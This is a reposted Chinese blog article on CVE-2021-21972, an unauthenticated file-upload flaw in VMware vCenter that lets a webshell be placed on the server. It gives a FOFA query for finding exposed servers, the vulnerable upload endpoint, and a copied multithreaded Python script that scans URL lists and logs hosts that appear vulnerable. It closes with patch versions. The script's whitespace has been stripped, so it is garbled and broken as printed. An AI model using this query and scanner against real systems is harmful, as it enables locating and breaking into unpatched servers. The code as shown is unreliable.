关于Vmware vcenter未授权任意文件上传漏洞(CVE-2021-21972)的问题
背景
CVE-2021-21972vmwarevcenter的一个未授权的命令执行漏洞。该漏洞可以上传一个webshell至vcenter服务器的任意位置,然后执行webshell即可。
影响版本
vmware:esxi:7.0/6.7/6.5
vmware:vcenter_server:7.0/6.7/6.5
漏洞复现fofa查询
语法:title="+ID_VC_Welcome+"
POC
https://x.x.x.x/ui/vropspluginui/rest/services/uploadova
使用https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC脚本批量验证
#-*-coding:utf-8-*- banner=""" 888888badP 88`8b88 a88aaaa8P'.d8888b.d8888P.d8888b.dPdP 88`8b.88'`8888Y8ooooo.8888 88.8888..88888888..88 88888888P`88888P8dP`88888P'`88888P' ooooooooooooooooooooooooooooooooooooooooooooooooooooo @time:2021/02/24CVE-2021-21972.py C0debyNebulabdSec-@batsu """ print(banner) importthreadpool importrandom importrequests importargparse importhttp.client importurllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) http.client.HTTPConnection._http_vsn=10 http.client.HTTPConnection._http_vsn_str='HTTP/1.0' TARGET_URI="/ui/vropspluginui/rest/services/uploadova" defget_ua(): first_num=random.randint(55,62) third_num=random.randint(0,3200) fourth_num=random.randint(0,140) os_type=[ '(WindowsNT6.1;WOW64)','(WindowsNT10.0;WOW64)','(X11;Linuxx86_64)', '(Macintosh;IntelMacOSX10_12_6)' ] chrome_version='Chrome/{}.0.{}.{}'.format(first_num,third_num,fourth_num) ua=''.join(['Mozilla/5.0',random.choice(os_type),'AppleWebKit/537.36', '(KHTML,likeGecko)',chrome_version,'Safari/537.36'] ) returnua defCVE_2021_21972(url): proxies={"scoks5":"http://127.0.0.1:1081"} headers={ 'User-Agent':get_ua(), "Content-Type":"application/x-www-form-urlencoded" } targetUrl=url+TARGET_URI try: res=requests.get(targetUrl, headers=headers, timeout=15, verify=False, proxies=proxies) #proxies={'socks5':'http://127.0.0.1:1081'}) #print(len(res.text)) ifres.status_code==405: print("[+]URL:{}--------存在CVE-2021-21972漏洞".format(url)) #print("[+]Commandsuccessresult:"+res.text+"\n") withopen("存在漏洞地址.txt",'a')asfw: fw.write(url+'\n') else: print("[-]"+url+"没有发现CVE-2021-21972漏洞.\n") #exceptExceptionase: #print(e) except: print("[-]"+url+"RequestERROR.\n") defmultithreading(filename,pools=5): works=[] withopen(filename,"r")asf: foriinf: func_params=[i.rstrip("\n")] #func_params=[i]+[cmd] works.append((func_params,None)) pool=threadpool.ThreadPool(pools) reqs=threadpool.makeRequests(CVE_2021_21972,works) [pool.putRequest(req)forreqinreqs] pool.wait() defmain(): parser=argparse.ArgumentParser() parser.add_argument("-u", "--url", help="TargetURL;Example:http://ip:port") parser.add_argument("-f", "--file", help="UrlFile;Example:url.txt") #parser.add_argument("-c","--cmd",help="Commandstobeexecuted;") args=parser.parse_args() url=args.url #cmd=args.cmd file_path=args.file ifurl!=Noneandfile_path==None: CVE_2021_21972(url) elifurl==Noneandfile_path!=None: multithreading(file_path,10)#默认15线程 if__name__=="__main__": main()
EXP修复建议
vCenterServer7.0版本升级到7.0.U1c
vCenterServer6.7版本升级到6.7.U3l
vCenterServer6.5版本升级到6.5U3n
到此这篇关于关于Vmwarevcenter未授权任意文件上传漏洞(CVE-2021-21972)的问题的文章就介绍到这了,更多相关Vmwarevcenter上传漏洞内容请搜索毛票票以前的文章或继续浏览下面的相关文章希望大家以后多多支持毛票票!
声明:本文内容来源于网络,版权归原作者所有,内容由互联网用户自发贡献自行上传,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任。如果您发现有涉嫌版权的内容,欢迎发送邮件至:czq8825#qq.com(发邮件时,请将#更换为@)进行举报,并提供相关证据,一经查实,本站将立刻删除涉嫌侵权内容。